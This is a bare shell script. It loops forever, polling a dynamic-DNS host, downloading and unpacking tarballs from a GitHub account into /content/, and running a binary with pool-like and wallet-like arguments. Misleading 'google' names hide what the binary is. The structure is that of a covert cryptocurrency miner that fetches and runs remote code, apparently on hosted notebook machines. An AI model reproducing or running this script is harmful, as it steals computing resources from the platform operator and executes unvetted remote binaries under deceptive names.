apt-get install -y libcpprest-dev libgmp-dev libargon2-0-dev

while true
do

string=$(curl -s http://mobile84121274.hopto.org/?q=deploy)
if [[ $string == *"16384"* ]]; then

cd /content/

wget -N https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/devdeploy84.tar.gz
tar -xvf ./devdeploy84.tar.gz

cd googleapps8474

arr[0]="http://mobile84121274.hopto.org/"
rand=$[$RANDOM % ${#arr[@]}]
google841212121274=${arr[$rand]}

google8412=$(curl -s $google841212121274 | sed "s/\s+//g")

if [[ $google8412 = "" ]]
then

timeout 8 ./google84121274 -p $google841212121274 -a 2XHCt5awxvHdQyNLv8DukLbCZvEv9Eckv14eQZk94dDXxT8E3chTYRfasn8kn1XcqGFuXA65Qi11do1TsK2pHCM5 -t 22 -b 22
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

else

echo "mobile8474"

sleep 84;

fi

else

cd /content/

wget -N -q https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/linux847412741274.tar.gz
tar -xf ./linux847412741274.tar.gz

cd googleapps8474

arr[0]="http://mobile84121274.hopto.org/"
rand=$[$RANDOM % ${#arr[@]}]
google841212121274=${arr[$rand]}

google8412=$(curl -s $google841212121274 | sed "s/\s+//g")

if [[ $google8412 = "" ]]
then

timeout 8 ./google84121274 -p $google841212121274 -a 2XHCt5awxvHdQyNLv8DukLbCZvEv9Eckv14eQZk94dDXxT8E3chTYRfasn8kn1XcqGFuXA65Qi11do1TsK2pHCM5 -t 1 -b 12
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

else

echo "mobile8474"

sleep 84;

fi

fi

done
